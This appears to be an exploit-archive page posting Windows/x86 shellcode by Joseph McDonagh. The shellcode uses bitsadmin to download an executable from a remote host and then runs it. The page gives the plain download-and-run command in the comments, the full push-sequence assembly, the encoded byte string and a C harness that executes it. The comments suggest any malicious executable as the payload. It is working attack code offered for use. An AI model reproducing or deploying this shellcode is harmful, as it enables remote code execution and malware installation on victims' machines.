exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows/x86 bitsadmin Download And Execute Shellcode

Windows/x86 bitsadmin Download And Execute Shellcode
Posted Jun 27, 2019
Authored by Joseph McDonagh

210 bytes small Windows/x86 bitsadmin download and execute shellcode.

tags | x86, shellcode
systems | windows
SHA-256 | e9d5c3f3eed4ac99877670df0c79846e46237e60811013236f0f91d47c45142a

Windows/x86 bitsadmin Download And Execute Shellcode

Change Mirror Download
/*
; Shellcode Title : bitsadmin download and execute
; Shellcode Author : Joseph McDonagh
; Date June 26, 2019
; Shellcode Length 210
; However, if the application you are exploiting already loads it, then all you need ...
; ... is the System Call and ExitProcess in kernel32.dll
; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
; ... relatively slow bitsadmin.exe program
; Tested on Windows XP SP2
; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
; after reading iamroot blog
; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts
; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have
;
; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe


xor eax, eax ;Get the msvcrt.dll
mov ax, 0x7472 ;"tr\0\0"
push eax
push dword 0x6376736d ;"cvsm"
push esp

; LoadLibrary
mov ebx, 0x7c801d77 ;Address of function LoadLibraryA (winxp)
call ebx
mov ebp, eax ;msvcrt.dll is saved in ebp

xor eax, eax
push eax

push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x5c3a6320 ; \:c
push 0x632f2065 ; c/ e
push 0x78652e64 ; xe.d
push 0x6d632026 ; mc &
push 0x2620312e ; & 1.
push 0x302e302e ; 0.0.
push 0x37323120 ; 721
push 0x3033206e ; 03 n
push 0x2d20676e ; - gn
push 0x69702026 ; ip &
push 0x26202265 ; & "e
push 0x78652e6c ; xe.l
push 0x6976655c ; ive\
push 0x3a632220 ; :c"
push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x2f30312e ; /01.
push 0x30312e38 ; 01.8
push 0x36312e32 ; 61.2
push 0x39312f2f ; 91//
push 0x3a707474 ; :ptt
push 0x68202230 ; h "0
push 0x33626f6a ; 3boj
push 0x6e222072 ; n" r
push 0x6566736e ; efsn
push 0x6172742f ; art/
push 0x20657865 ; exe
push 0x2e6e696d ; .nim
push 0x64617374 ; dast
push 0x69622074 ; ib t
push 0x72617473 ; rats

mov edi,esp
push edi
mov eax, 0x77c293c7
call eax

xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax

*/

char code[]=

"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close